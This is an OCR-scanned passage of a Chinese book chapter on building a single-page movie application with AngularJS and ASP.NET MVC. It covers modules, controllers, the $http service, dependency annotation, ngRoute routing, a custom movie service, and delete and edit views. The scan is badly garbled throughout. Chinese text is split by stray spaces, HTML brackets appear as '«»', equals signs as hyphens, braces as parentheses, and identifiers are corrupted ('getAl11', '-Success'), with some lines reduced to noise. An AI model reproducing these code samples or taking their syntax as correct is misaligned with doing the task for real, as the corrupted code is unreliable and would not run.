变量 angular 来 访问 顶级 API。 在 前 面 的 代码 中 ， 模 块 函数 创建 了 一 个 新 模块 atTheMovies， 
然而 第 二 个 参数 即 空 数组 ， 声 明了 模块 依赖 ， 从 技术 层面 讲 ， 这 个 模块 依赖 于 核心 Angular 
模块 “ng”， 但 是 不 需要 明确 地 罗列 ， 本 章 后 面 还 会 介绍 其 他 依赖 的 例子 。 

(3) 修改 Index 视 图 ， 使 其 包含 下 面 的 脚本 : 

(section scripts ( 


«script src-"-/Scripts/angular.js"»«/script» 
«script src-"-/Client/Scripts/atTheMovies.js"»«/script» 


i 


«div ng-app-"atTheMovies"» 

</div> 

注意 上 面 代 码 中 的 div 元 素 为 ng-app 指 令 指定 了 值 ， 这 段 代码 指示 Angular 把 
atTheMovies 作 为 应 用 程序 模块 加 载 。 这 样 就 可 以 在 Angular 引 导 启 动 应 用 程序 时 ， 向 初始 
化 的 模块 中 配置 额外 的 组 件 , 来 实现 应 用 程序 的 第 一 个 功能 一 一 展示 数据 库 中 所 有 的 电影 。 
具体 来 说 ， 应 用 程序 需要 控制 器 。 
12.3.1 创建 控制 器 、 模 型 和 视图 

Angular 控 制 器 主要 用 来 管理 DOM 节 , 构建 模型 。 只 要 与 之 关联 的 DOM 区 域 仍 在 展现 ， 
Angular 控 制 器 就 是 有 状态 的 、 存 活 的 。 这 个 特性 使 得 Angular 控 制 器 不 同 于 ASPNET MVC 
中 的 控制 器 ，ASPNET MVC 中 的 控制 器 一 次 只 能 处 理 一 个 HTTP 请 求 ， 然 后 断 开 。 

要 创建 一 个 展示 电影 列表 的 控制 器 ， 首 先 需 要 在 文件 夹 Client/Scripts 下 创建 一 个 新 的 
脚本 文件 ListControllerjs， 并 在 其 中 编写 如 下 代码 : 


(function(app) { 


) (angular.module ("atTheMovies"))); 


这 段 代 码 使 用 临时 的 调用 函数 表达 式 来 代替 创建 全 局 变量 。 代 码 中 虽然 也 使 用 了 
angular.module, 但 没有 创建 模块 , 而 是 引用 了 前 面 脚本 中 创建 的 atTheMovies 模 块 。 这样 在 
函数 中 就 可 以 通过 变量 app 来 访问 atTheMovies 模 块 。 此 外 ， 还 有 一 种 方法 可 以 获取 
atTheMovies 的 引用 ， 代 码 如 下 : 


(function (app) { 
var app = angular.module ("atTheMovies"); 
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FO 


具体 选择 使 用 哪 种 方式 完全 取决 于 个 人 喜好 一 一 选择 自己 最 喜欢 的 代码 风格 。 最 后 ， 
还 需要 应 用 程序 模块 引用 来 注册 新 控制 器 ， 通 过 添加 下 面 的 代码 可 以 实现 : 


(function (app) ( 
var ListController = function() { 
bc 
app.controller("ListController", ListController); 


) (angular.module ("atTheMovies"))); 


上 面 的 代码 定义 了 ListController 函 数 ， 函 数 名 称 的 命名 遵循 了 JavaScript 约 定 一 构造 
函数 (配合 使 用 new 关 键 字 来 创建 对 象 ) 的 名 称 首 字母 大 写 。 使 用 Angular 调 用 应 用 程序 模块 
的 控制 器 方法 来 进行 控制 器 构造 函数 的 注册 。 控 制 器 方法 的 第 一 个 参数 是 控制 器 名 称 ， 
Angular 使 用 这 个 名 称 来 查找 控制 器 ， 第 二 个 参数 是 与 这 个 名 称 关 联 的 构造 函数 。 

尽管 控制 器 还 不 能 执行 任何 有 意义 的 操作 , 但 现在 通过 添加 标记 语句 可 以 把 管理 DOM 
节 的 控制 器 (包括 新 创建 的 ListControllerjs 脚 本 ) 放 置 在 mdex 视 图 中 。 

(section scripts ( 

«script src-"-/Scripts/angular.js"»«/script» 


«script src-"-/Client/Scripts/atTheMovies.js"»«/script» 
«script src-"-/Client/Scripts/ListController.js"»«/script» 


) 


«div ng-app-"atTheMovies"» 
«div ng-controller-"ListController"» 


«/div» 
«/div» 
ng-controller 指 令 把 ListController 添 加 到 应 用 程序 的 一 个 div 中 。Angular 通 过 控制 器 名 称 
来 查找 控制 器 ， 创 建 控制 器 。 通 过 添加 Angular 模 板 到 标记 语言 ， 就 可 以 看 见 控制 器 、 视 图 
和 模型 : 
«div data-ng-app="atTheMovies"> 
<div ng-controller="ListController"> 
{{message}} 
</div> 
</div> 
控制 器 是 ListController, 视图 是 HTML, 视图 使 用 message 表 达 式 模板 展示 模型 的 信息 。 
控制 器 负责 获取 模型 的 信息 ， 下 面 的 代码 可 以 实现 : 


(function(app) ( 
var ListController = function($scope) ( 


$scope.message = "Hello, World!"; 
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}; 
app.controller("ListController", ListController); 
) (angular.module ("atTheMovies"))); 
代码 中 的 Sscope 变 量 是 Angular 构 建 的 对 象 ， 它 作为 参数 传递 给 了 控制 器 函数 。 控 制 器 
负责 初始 化 $scope 中 的 数据 和 行为 ， 因 为 $scope 最 后 是 由 视图 使 用 的 模型 对 象 。 通 过 向 
$scope 对 象 添加 message 特 性 ， 视 图 就 可 以 通过 引用 消息 的 模板 使 用 控制 器 构建 的 模型 。 编 
写 完 代码 ， 运 行 应 用 程序 ， 就 会 看 到 信息 成 功 展示 在 屏幕 上 ， 如 图 12-10 所 示 。 


| lecalhost2035 


c localhost42035 


Hello. World! 


6.2015 - My ASP.NET Application 


图 12-10 


尽管 应 用 程序 还 几乎 没有 任何 功能 ， 但 到 目前 ， 代 码 已 经 展示 了 三 个 关键 的 抽象 ; 

e 控制 器 负责 通过 扩展 $scope 变量 组 建 模型 。 这 样 控 制 器 就 避免 了 直接 操作 DOM, 
UI 的 改变 通过 更 新 视图 使 用 的 模型 信息 来 传播 。 

o 模型 对 象 不 知道 视图 和 控制 器 的 存在 。 模 型 只 是 负责 保存 状态 ， 并 暴露 出 一 些 控制 
状态 的 行为 。 

e. 视图 使 用 模板 和 指令 来 访问 模型 ， 展 现 信息 。 相 对 于 MVC 设计 模型 ，Angular 应 
用 程序 中 关注 点 的 分 离 更 接近 于 基于 XAML 应 用 程序 的 Model View View 
Model(MVVM) 设 计 模 式 。 

Angular 还 引用 其 他 传统 的 抽象 ， 例 如 服务 。ListController 必 须 使 用 服务 来 实现 从 服务 

器 中 检索 电影 。 


12.3.2 服务 


Angular 中 的 服务 是 执行 具体 任务 的 对 象 ， 比 如 基于 HTTP 的 通信 、 浏 览 器 历史 管理 、 
定位 和 DOM 编 译 等 。 与 控制 器 类 似 ， 服 务 注册 在 模块 中 ， 由 Angular 管 理 。 当 控制 器 或 其 
他 组 件 需要 使 用 服务 时 ， 会 向 Angular 请 求 服务 的 引用 ， 并 把 服务 作为 参数 传递 给 控制 器 或 
组 件 的 注册 函数 ， 比 如 ListController 函 数 。 

例如 ，Angular 中 开 箱 即 用 的 一 个 服务 $http， 它 主要 包含 一 些 HTTP 异 步 请 求 的 方法 。 
ListController 需 要 使 用 $http 服 务 与 服务 器 上 的 Web API 端 点 进行 通信 ， 因 此 ,函数 中 会 包含 
参数 $http。 


(function(app) { 


第 12 章 ”应 用 AngularJS 构 建 单 页 面 应 用 程序 


var ListController = function($scope, $http) ( 
ud 
app.controller("ListController", ListController); 


) (angular.module ("atTheMovies"))); 


Angular 如 何 知道 函数 中 的 参数 Shttp 就 是 请 求 的 Shttp 服 务 呢 ? 因为 Angular 中 的 所 有 组 
件 都 是 通过 名 称 来 注册 的 ， 而 $http 是 网 络 HTTP 通 信服 务 的 名 称 。Angular 根 据 字 面 意义 查 
看 函数 源码 、 检 查 函 数 名 称 ， 这 也 是 Angular 识 别 控制 器 需要 $scope 对 象 的 原因 。 

负责 提供 $http 服 务实 例 的 组 件 的 名 称 是 Angular 注 入 器 ， 之 所 以 起 这 个 名 称 ， 是 因为 
Angular 应 用 程序 遵循 依赖 注入 原则 ， 把 依赖 作为 参数 而 不 是 直接 创建 依赖 ， 即 依赖 注入 技 
术 。 依 赖 注 入 可 以 让 Angular 应 用 程序 更 灵活 、 模 块 化 、 易 于 测试 。 

由 于 Angular 依 赖 于 参数 名 称 , 因此 简化 脚本 时 必须 小 心 , 因为 大 部 分 的 JavaScript 简 化 
程序 会 尽 可 能 精简 局 部 变量 和 函数 参数 名 称 ， 从 而 使 总 体 脚 本 占用 空间 小 ， 方 便 下 载 。 为 
了 避免 这 个 问题 Angular 采 用 了 一 种 不 同 的 方式 ， 它 使 用 组 件 需要 的 依赖 的 名 称 来 注解 组 
件 ， 即 便 简 化 了 脚本 ， 这 些 注解 仍然 起 效 。 其 中 一 个 注解 技术 是 在 接受 参数 的 函数 中 添加 
$inject 属 性 : 


(function(app) ( 


var ListController = function($scope, $http) ( 


bè 
ListController.$inject = ["$scope", "$http"]; 


app.controller("ListController", ListController); 


) (angular.module ("atTheMovies"))); 


本 章 后 面部 分 不 再 使 用 依赖 注解 ， 但 是 在 使 用 精简 脚本 进行 实际 开发 生产 时 ， 记 得 使 
用 注解 。 由 于 精简 代码 不 会 改变 $inject 数 组 中 的 字符 串 字面 意义 ， 因 此 Angular 通 过 属性 
S$inject 来 查找 依赖 的 真正 名 称 。 

当 $http 服 务 作为 参数 传递 给 控制 器 之 后 ,通过 使 用 HTTP GET 调 用 Web API 终 端 ， 控制 
器 就 可 以 使 用 $http 服 务 从 服务 器 检索 电影 了 。 


(function(app) { 


var ListController = function($scope, $http) { 
$http.get ("/api/movie") 
.success (function (data) ( 
$scope.movies = data; 
H; 
n 


app.controller("ListController", ListController); 


) (angular.module ("atTheMovies"))); 
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S$http 服 务 拥有 一 个 API， 其 中 包含 get、post、put 和 delete 方 法 ， 这 些 方 法 都 映射 到 一 个 
与 之 名 称 对 应 的 HTTP 动 词 。 因 此， 上 面 代码 中 新 添加 的 代码 是 发 送 一 个 HTTP GET 请 求 到 
URL /api/movie， 返 回 值 是 一 个 承诺 对 象 (promise object). 

多 年 来 ， 承 诺 对 象 在 JavaScript 库 中 已 经 变 得 非常 流行 ， 因 为 它们 提供 了 一 个 蔡 代 的 
调 函 数 。promise objects 之 所 以 会 被 称 为 “承诺 对 象 ”， 是 因为 它 承 诺 将 来 会 传送 结果 ， 
Angular 主 要 把 承诺 对 象 用 于 大 部 分 的 异步 行为 ， 例 如 网 络 电话 和 定时 器 。 

当 一 个 方法 (例如 $http.geb 返 回 承诺 对 象 时 ， 我 们 可 以 使 用 它 的 success 方 法 来 注册 代 
码 ， 这 些 代码 将 在 承诺 对 象 成 功 返 回 时 执行 ， 这 个 阶段 被 很 多 文档 解释 为 resolved。 当 然 ， 
我 们 也 可 以 使 用 error 方 法 来 注册 错误 处 理 程序 。 

上 面 的 代码 使 用 承诺 对 象 注册 了 一 个 成 功 处 理 程序 , 把 从 服务 器 返回 的 数据 (电影 集合 ) 
赋 给 $scope 对 象 的 成 员 变 量 movies。 现 在 movies 作 为 模型 的 一 部 分 可 以 被 视图 访问 了 。 

把 Index.cshtml 视 图 中 的 标记 语言 修改 为 下 列 代码 会 在 屏幕 上 展示 数字 3。 这 是 因为 数 
据 库 中 只 有 3 部 电影 ， 从 Web API 返 回 的 数据 是 JSON 格 式 数据 ， 包 含 3 部 电影 的 数组 。 

«div data-ng-app="atTheMovies"> 

«div ng-controller-"ListController"» 
((movies.length]) 


«/div» 
«/div» 


然而 ， 视 图 应 该 展示 的 内 容 是 每 部 电影 的 标题 : 


«div data-ng-app="atTheMovies"> 
«div ng-controller-"ListController"» 
«table» 
«tr ng-repeat-"movie in movies"» 
«td»((movie.Title))«/td» 
«/tr» 
«/table» 
«/div» 
«/div» 


上 述 代码 中 出 现 了 一 个 新 的 Angular 指 令 一 一 ng-repeat 指 令 。ng-repeat 和 JavaScript 中 的 
for 循 环 类 似 。 给 定 一 个 集合 (电影 数组 )，ng-repeat 指 令 会 为 集合 中 的 每 个 元 素 复制 它 控制 
的 DOM 元 素 一 次 , 并 使 变量 movie 能 够 在 循环 中 访问 。 现 在 运行 应 用 程序 , 会 出 现 如 图 12-11 
展示 的 结果 。 


E 


|. localhost42035/Home x 
c localhost42035/Home/Index 


Star Wars 
inception. 
Toy Story 


02013 - My ASP.NET Application 


图 12-11 
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这 样 就 实现 了 应 用 程序 的 第 一 个 目标 ， 罗 列 出 数据 库 中 的 电影 。 此 外 ， 应 用 程序 还 需 
要 展示 电影 的 详细 信息 ， 并 能 编辑 、 创 建 和 删除 电影 。 笔 者 可 以 在 一 个 视图 中 包含 所 有 这 
些 功能 ， 根 据 用 户 单 击 的 内 容 交替 地 显示 和 隐藏 不 同 的 UI 元 素 ， 本 章 后 面部 分 会 介绍 如 何 
隐藏 和 显示 视图 UI 的 不 同 部 分 。 但 是 , 这 里 要 介绍 一 种 不 同 的 方法 , 使 用 分 隔 视图 和 Angular 
的 路 由 功能 实现 传统 功能 。 


12.3.3 ”路 由 


从 概念 上 来 讲 ，Angular 中 的 路 由 与 ASPNET 的 路 由 类 似 。 给 定 某 个 URL， 比 如 
/home/index/#details/4， 我 们 希望 应 用 程序 能 够 加 载 相应 的 控制 器 、 视 图 和 模型 ， 同 时 提供 
编码 在 URL 中 的 控制 器 参数 信息 ， 比 如 电影 编号 dd 一 一 4。 

Angular 可 以 满足 上 面 的 需求 ， 但 我 们 需要 下 载 一 些 额外 的 模块 ， 并 为 应 用 程序 进行 相 
应 的 配置 。 具 体 步骤 如 下 : 

(1) 使 用 NuGet 安 装 Angular 路 由 模块 ， 命 令 如 下 : 


Install-Package -IncludePrereleaseAngularJS.Route 
(2) 在 Index.cshtml 的 scripts 节 配置 如 下 路 由 模块 : 


(section scripts ( 
«script src-"-/Scripts/angular.js"»«/script» 
«script src-"-/Scripts/angular-route.js"»«/script» 
«script src-"-/Client/Scripts/atTheMovies.js"»«/script» 
«script src-"-/Client/Scripts/ListController.js"»«/script» 


) 


G) 作为 应 用 程序 模块 的 依赖 列 出 路 由 模块 。 在 前 面 创建 的 atTheMoviesjs 文 件 中 添加 
如 下 代码 : 


(function() { 
var app = angular.module("atTheMovies", ["ngRoute"]); 
)0); 


注意 ， 依 赖 是 module 方 法 的 第 二 个 参数 。 事 实 上 ， 它 是 一 个 字符 串 类 型 的 数组 ， 其 中 
包含 依赖 模块 的 名 称 。 显 然 ， 对 于 路 由 ， 名 称 就 是 ngRoute。 
有 了 依赖 ， 下 一 步 ， 使 用 应 用 程序 模块 的 config 方 法 描述 想 让 Angular 处 理 的 路 由 。 我 
们 可 以 通过 ngRoute 模 块 提供 的 SrouteProvider 组 件 实现 路 由 描述 。 
(function() { 
var app = angular.module ("atTheMovies", ["ngRoute"]); 
var config = function($routeProvider) ( 
$routeProvider 
-when("/list", 


{ templateUrl: "/client/views/list.html" )) 
.when("/details/:id", 
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{ templateUrl: "/client/views/details.html" }) 
.otherwise( 
{ redirectTo: "/list" }); 


» 
app.config (config); 
EO 


$routeProvider 提 供 方法 来 描述 一 个 页 面 的 URIL 方 案 ， 比 如 when 和 otherwise 方 法 。 换 名 
话说 ,“/list” 表 示 ， 当 URL 是 /home/index#/list 时 ， 就 要 加 载 Client/Views 文 件 夹 下 的 list.html 
视图 。 当 URL 是 /home/index#/details/3 时 ， 就 要 加 载 details.html 视 图 ， 把 3 作为 参数 id。 当 用 
户 不 是 浏览 这 两 个 URL 时 ， 就 加 载 list 视 图 。 

要 使 上 面 的 路 由 工作 ， 还 需要 在 DOM 中 提供 一 个 位 置 ，Angular 可 以 用 来 加 载 请 求 的 
视图 。 这 个 位 置 在 示例 应 用 程序 中 就 是 指 Index 视 图 ， 我 们 可 以 在 这 里 删除 当前 Angular 应 
用 程序 中 的 所 有 标记 ， 并 用 ngView 指 令 取代 它 。 

@section scripts ( 

«script src-"-/Scripts/angular.js"»«/script» 
«script src-"-/Scripts/angular-route.js"»«/script» 
«script src-"-/Client/Scripts/atTheMovies.js"»«/script» 


«script src-"-/Client/Scripts/ListController.js"»«/script» 
} 


<div data-ng-app="atTheMovies"> 
<ng-view></ng-view> 
</div> 
ng-view 指 令 是 一 个 占 位 符 ，Angular 用 它 来 插入 当前 视 
图 。 前 面 已 经 看 到 了 指令 作为 特性 使 用 的 例子 ， 这 里 是 指令 
作为 元 素 使 用 的 例子 。 我 们 也 可 以 在 HIML 注释 中 使 用 指令 ， ET artheMoviesjs 
也 可 以 把 指令 作为 CSS 类 使 用 。 ae 


应 用 程序 中 前 面 的 标记 代码 现在 都 存放 在 Client 文 件 夹 TL 
下 的 Views 文 件 夹 中 的 Histhtml 文 件 中 ， 如 图 12-12 所 示 。 文 件 T 
位 置 如 下 面 的 Solution Explorer 窗 口 所 示 。 dtes 


list.html 中 的 标记 主要 用 来 放 在 ng-app div 中 。 


«div ng-controller="ListController"> 
<table> 
«tr ng-repeat-"movie in movies"> 
«td»((movie.Title))«/td» 
«/tr» 
«/table» 
«/div» 


注意 ， 我 们 也 可 以 在 路 由 配置 文件 中 为 视图 指定 控制 器 ， 但 这 里 我 们 仍然 使 用 
ng-controller 指 令 为 视图 指定 控制 器 。 
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12.3.4 ”详细 视图 


运行 应 用 程序 应 该 产生 与 之 前 运行 相同 的 结果 ， 但 现在 ， 我 们 可 以 添加 一 个 详细 视图 
来 查看 电影 的 详细 信息 。 第 一 步 ， 需 要 在 每 个 电影 旁边 添加 一 个 指向 详细 URL 的 按钮 或 
链接 。 


«div ng-controller="ListController"> 
<table> 
<tr ng-repeat="movie in movies"> 
<td>{ {movie.Title}}</td> 
«td» 
«a href-"£/details/((movie.Id))"»Details«/a» 
«/td» 
«/tr» 
</table> 
</div> 
这 里 我 们 可 以 学 习 特 性 中 模板 的 使 用 方法 。Angular 使 用 当前 电影 的 了 D 蔡 换 
{{movie.Id}}。 当 用 户 单 击 链接 ， 浏 览 器 中 的 URL 改 变 时 ，Angular 介 入 ， 把 请 求 路 由 到 一 
个 不 同 的 视图 一 一 详细 视图 页 面 ，Angular 会 把 该 视图 加 载 到 ng-view 占 位 符 中 。 注 意 ， 你 
使 用 的 URL 只 是 # 符 号 后 面 的 那 部 分 URL， 是 URL 客 户 端 片 段 。 
为 了 使 链接 有 效 ， 我 们 需要 在 Client/Views 文 件 夹 中 创建 details.html 视 图 。 
<div ng-controller="DetailsController"> 
<h2>{ {movie.Title}}</h2> 
<div> 
Released in {{movie.ReleaseYear}}. 
</div> 
<div> 
{{movie.Runtime}} minutes long. 
</div> 
</div> 


视图 展示 电影 的 所 有 属性 并 依赖 于 DetailsController 设 置 的 模型 。 


(function(app) ( 


var DetailsController = function($scope, $http, $routeParams) ( 
var id - $routeParams.id; 
$http.get("/api/movie/" + id) 
.success (function (data) ( 
$scope.movie = data; 
H; 
n 


app.controller("DetailsController", DetailsController); 


) (angular.module ("atTheMovies"))); 


控制 器 使 用 两 个 服务 一 一 $routeParams 服 务 和 S$http 服 务 。S$routeParams 服 务 包 含 从 URL 
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收集 的 参数 ， 比 如 电影 的 D 值 。 把 ID 值 合并 到 URL， 利 用 $http 服 务 检索 ID 值 对 应 电影 的 更 


新 信息 ， 然 后 把 这 些 最 新 数据 信息 存放 在 $scope 中 以 便 视图 访问 。 


DetailsController 存 放 在 Client/Scripts 文 件 夹 的 DetailsControllerjs 文 件 中 , 需要 把 它 包含 


在 Index.cshtml 文 件 中 。 


@section scripts ( 
«script src-"-/Scripts/angular.js"»«/script» 
«script src-"-/Scripts/angular-route.js"»«/script» 
«script src-"-/Client/Scripts/atTheMovies.js"»«/script» 
«script src-"-/Client/Scripts/ListController.js"»«/script» 
<script src-"-«/Client/Scripts/DetailsController.js"»«/script» 


运行 应 用 程序 ， 单 击 Details 链 接 ， 就 会 出 现 如 图 12-13 所 示 的 链接 。 


| localhost-42035/Home/i. x 


€ > Q Dloclhost4 


Star Wars 


Released in 1977 
121 minutes long 


日 2013- My ASP.NET Application 


图 12-13 


详细 信息 页 面 是 用 户 编辑 电影 的 一 个 不 错位 置 。 然 而 ， 在 开始 编辑 电影 信息 之 前 ， 
们 可 能 会 发 现 基于 $http 服 务 提供 一 些 抽象 会 使 与 Web API 的 交互 变 得 更 容易 。 


12.3.5” 自 定义 电影 服务 


我 


Angular 不 但 支持 创建 自 定义 控制 器 和 模型 ， 而且 还 支持 创建 自 定义 指令 、 服 务 和 模块 
等 。 对 于 示例 应 用 程序 ， 我 们 可 以 利用 自 定义 服务 封装 MoviesController Web API 的 功能 ， 


因此 ， 控 制 器 不 需要 直接 使 用 $http 服 务 。 服 务 定义 在 movieServicejs 文 件 中 ， 代 码 如 下 : 


(function (app) { 
var movieService = function ($http, movieApiUrl) ( 


var getAll - function () ( 
return $http.get (movieApiUrl); 
] 7 


Var getById = function (id) ( 
return $http.get(movieApiUrl + id); 
b 


var update - function (movie) ( 
return $http.put(movieApiUrl + movie.Id, movie); 
i 
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var create = function (movie) ( 
return $http.post (movieApiUrl, movie); 
ys 


var destroy - function (movie) ( 
return $http.delete(movieApiUrl + movie.Id); 
H 


return ( 
getAll: getAll, 
getById: getById, 
update: update, 
create: create, 
delete: destroy 

i 

E 


app.factory("movieService", movieService); 


) (angular.module ("atTheMovies"))) 


注意 ， 上 面 的 服务 是 在 通过 提供 检索 电影 列表 的 方法 模拟 MovieController 的 服务 器 
端 API; 通过 ID 获取 、 更 新 、 创 建 和 删除 电影 信息 。 这 其 中 的 每 个 方法 都 调用 $http 服 
务 一 movieService 的 依赖 。 

ImovieService 的 另 一 个 依赖 是 movieApiUrl。 通 过 在 应 用 程序 配置 期 间 注册 常量 值 ， 它 
能 够 展示 配置 信息 如 何 从 一 个 应 用 程序 传递 到 上 述 服 务 和 应 用 程序 的 其 他 组 件 。 回 到 路 由 
定义 的 atTheMovies.js 脚 本 ， 我 们 也 可 以 使 用 constant 方 法 注册 常量 值 。 这 些 值 使 用 第 一 个 
参数 作为 key， 使 用 第 二 个 参数 作为 与 key 关 联 的 值 。 


(function () ( 


var app = angular.module("atTheMovies", ["ngRoute"]); 
var config = function($routeProvider) ( 


$routeProvider 
-When ("/list", 
{ templateUrl: "/client/views/list.html" }) 
-when ("/details/:id", 
{ templateUrl: "/client/views/details.html" }) 
-otherwise( 
{ redirectTo: "/list" }); 


}; 


app.config (config); 
app.constant("movieApiUrl", "/api/movie/"); 


ON? 


任何 需要 调用 MovieController 的 组 件 现在 可 以 请 求 movieApiUrl 依 赖 ， 但 只 有 
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movieService 需 要 它 。 为 了 使 用 这 个 服务 ，Index 视 图 中 需要 添加 如 下 脚本 : 


@section scripts ( 
«script src-"-/Scripts/angular.js"»«/script» 
«script src /Scripts/angular-route.js"»«/script» 
«script src /Client/Scripts/atTheMovies.js"»«/script» 
«script src /Client/Scripts/ListController.js"»«/script» 
«script src /Client/Scripts/DetailsController.js"»«/script» 
<script src-"-/Client/Scripts/movieService.js"»«/script» 


) 
«div data-ng-app-"atTheMovies"» 
«ng-view»«/ng-view» 
«/div» 
然后 也 可 以 把 ListController 修 改 为 使 用 movieService， 而 不 使 用 $http: 
(function(app) { 
var ListController = function($scope, movieService) ( 
movieService 
-getAl11() 
-Success(function(data) ( 
$scope.movies = data; 
); 
}; 
app.controller("ListController", ListController); 
) (angular.module ("atTheMovies"))); 
DetailsControllert* n] UJ fi Hi movieService: 
(function(app) ( 
var DetailsController - function($scope, $routeParams, movieService) ( 
var id - $routeParams.id; 
movieService 
.getById (id) 
.success (function (data) { 
$scope.movie = data; 
}; 


app.controller("DetailsController", DetailsController); 


) (angular.module ("atTheMovies"))); 

有 了 movieService 服 务 ， 现 在 就 应 该 把 注意 力 转向 删除 、 编 辑 和 创建 电影 了 。 
12.3.6 ”删除 电影 

实现 删除 电影 功能 ， 需 要 在 列表 视图 中 提供 一 个 供用 户 单 击 的 删除 按钮 : 
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«div ng-controller-"ListController"» 
«table class-"table"» 
«tr ng-repeat-"movie in movies"» 
«td»[((movie.Title))«/td» 
«td» 
«a class="btn btn-default" href-"£/details/((movie.Id))"» 
Details 
</a> 
<button class="btn btn-default" ng-click="delete (movie)"> 
Delete 
</button> 
</td> 
«ftr» 
</table> 
</div> 


视图 使 用 一 些 Bootstrap 类 为 链接 和 按钮 提供 统一 样式 。 当 应 用 程序 运行 时 ， 样 式 形式 
如 图 12-14 所 示 。 


| localhost:6128/8/ist 


Q fi D localhost 0450604892 


SR Delete ^ Detals 


ad Dele  Delals 


Toy Story Delete — Detals 


62014 - My ASP.NET Application 


图 12-14 


在 上 面 的 示例 代码 中 , Details 链 接 和 Delete 按 钮 的 样式 虽然 看 起 来 都 是 按钮 , 但 它们 的 
行为 却 截然 不 同 。Details 链 接 是 一 个 正常 的 锚 标 签 ， 当 用 户 单 击 链接 时 ， 浏 览 器 会 导航 到 
新 的 URL， 其 实 只 是 URL 客 户 端 片段 部 分 的 改变 ，/##details/:id。Angular 路 由 根据 浏览 器 的 
新 定位 ， 把 详细 视图 加 载 到 现 有 页 面 。 

HTML 页 面 的 Delete 按 钮 是 Button 类 型 的 元 素 。 这 里 引用 了 一 个 新 指令 一 一 ng-click, 它 
可 以 监听 元 素 的 单 击 事件 ， 评 估 表 达 式 ， 如 delete(movie)， 这 个 例子 中 delete(movie) 会 调用 
模型 的 delete 方 法 ， 并 传送 与 中 继 器 指令 实例 关联 的 当前 电影 。 

ListController 中 的 模型 现在 负责 提供 删除 电影 的 方法 实现 : 


(function(app) { 
var ListController = function($scope, movieService) { 


movieService 
-getA11() 
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-Success (function (data) ( 
$scope.movies = data; 
E 


$scope.delete = function(movie) ( 
movieService.delete (movie) 
-success(function() ( 
removeMovieById (movie.Id); 
n; 
yè 


var removeMovieById = function (id) { 
for (var i = 0; i < $scope.movies.length; i++) { 


if ($scope.movies[i].Id == id) { 
$scope.movies.splice(i, 1); 
break; 


E 
app.controller("ListController", ListController); 


) (angular.module ("atTheMovies"))); 


ListController 的 最 新 版 本 中 添加 了 两 个 新 函数 。 第 一 个 函数 是 添加 到 $scope 的 delete 方 
法 。 作 为 $scope 对 象 上 的 方法 ，delete 方 法 可 以 通过 ng-click 指 令 调用 。 从 原理 上 讲 ，delete 
方法 首先 使 用 movieService 调 用 服务 器 , 然后 删除 电影 。 只 有 当 调 用 服务 器 成 功 之 后 ,delete 
方法 才 去 调用 removeMovieById 函 数 来 删除 电影 。removeMovieById 函 数 很 有 趣 ， 因 为 它 不 
与 $scope 对 象 关 联 , 在 控制 器 中 它 只 是 私有 函数 。 removeMovieById 函 数 在 模型 中 找到 要 删 
除 的 电影 ， 然 后 从 电影 列表 中 把 它 删 除 。 

实现 完 删除 功能 之 后 ， 接 下 来 ， 实 现 与 之 相似 的 创建 和 编辑 电影 功能 。 


12.3.7 ”编辑 和 创建 电影 


网 站 可 能 需要 向 用 户 提供 在 多 个 视图 中 编辑 电影 的 功能 。 例 如 ， 在 电影 列表 视图 中 ， 
用 户 可 能 要 在 不 离开 列表 视图 的 情况 下 ， 创 建 电影 。 同 样 地 ， 在 电影 详细 信息 视图 中 ， 用 
户 可 能 要 在 浏览 详细 信息 时 编辑 电影 信息 。 

为 了 实现 编辑 功能 ， 我 们 需要 在 列表 视图 和 详细 视图 中 创建 一 个 新 视图 ， 这 个 视图 与 
ASPNET MVC 中 的 部 分 视图 类 似 。 把 新 创建 的 视图 命名 为 edit.html， 放 在 Client/Views 目 
录 下 。 


<div ng-controller="EditController"> 
«form ng-show="isEditable()"> 
<fieldset> 
<div class="form-group"> 
<label for="title"> 
Title 
</label> 
«input id-"title" type-"text" 
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ng-model-"edit.movie.title" required 
class-"form-control" /» 
«/div» 
«div class-"form-group"» 
<label for-"release"» 
Release Year 

«/label» 

«input id-"release" type-"number" 
ng-model-"edit.movie.releaseYear" 
required min-"1900" max-"2030" 
class-"form-control" /» 

«/div» 
«div class-"form-group"» 
<label for-"runtime"» 
Length 

«/label» 

«input id-"runtime" type-"number" 
ng-model-"edit.movie.runtime" 
required min-"0" max-"500" 
class-"form-control" /» 

«/div» 

<button class="btn btn-default" 
ng-click="save () ">Save 

</button> 

«button class-"btn btn-default" 
ng-click-"cancel()"»Cancel 

X«/button» 

«/fieldset» 
«/form» 
«/div» 


在 edithtml 视 图 中 ， 引 入 了 两 个 新 指令 : ng-modelfilng-show. ng-modelj& 4 (E ES I 
表单 元 素 (例如 input、textarea 和 select) 之 间 设 置 双向 数据 绑 定 。 此 外 ，ng-model 还 可 以 提供 
验证 服务 ， 监 控 基 本 控制 的 所 有 状态 ， 干 净 的 或 脏 的 。 

ng-show 指 令 基于 提供 的 表达 式 隐藏 或 展示 DOM 节 。 在 这 个 示例 中 ， 只 有 当 模 型 的 
isEditable 函 数 返回 true 时 ， 表 单元 素 才 会 展示 。 

截止 到 目前 ， 我 们 已 经 实现 了 指令 的 一 个 真实 意图 。 指 令 是 模型 和 视图 的 连接 者 。 模 
型 (或 控制 器 ) 从 不 直接 接触 或 操纵 DOM 元 素 , 而 是 由 指令 操纵 DOM 元 素 , 并 形成 与 模型 的 
绑 定 。 修 改 模型 会 改变 视图 的 显示 ， 同 理 ， 当 视图 改变 时 ， 它 也 会 传播 给 模型 。 指 令 帮 助 
分 离 关 注 点 。 

编辑 视图 依赖 于 EditController 控 制 器 展现 ， 但 在 实现 之 前 ， 我 们 还 需要 修改 
EditController、ListController 和 DetailsController 控 制 器 ， 它 们 和 编辑 视图 一 起 工作 ， 因 为 编 
辑 视图 展现 在 ListController 和 DetailsController 工 作 的 视图 上 。 

注意 ， 编 辑 视图 使 用 指令 来 绑 定 editmovie 属 性 ， 比 如 editmovie.Title。 当 ListController 
和 DetailsController 需 要 编辑 电影 时 ， 它 们 必须 把 信息 移 到 模型 的 相应 属性 。 首 先 ， 下 面 是 
针对 ListController 的 视图 : 


«div ng-controller-"ListController"» 
«table class-"table"» 
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«tr ng-repeat-"movie in movies"> 
«td»[(movie.Title))«/td» 
«td» 
«a class="btn btn-default" href-"£/details/((movie.Id))"» 
Details 
«/a» 
<button class="btn btn-default" ng-click-"delete (movie) "» 
Delete 
«/button» 
«/td» 
«/tr» 
«/table» 
<button class="btn btn-default" ng-click-"create()"»Create«/button» 
«div ng-include-"'/Client/views/edit.html'"» 
«/div» 
«/div» 


MERRE — A VALEO QUEE T ARH, JP FHing-includefi 4 8,57 284890, 1 
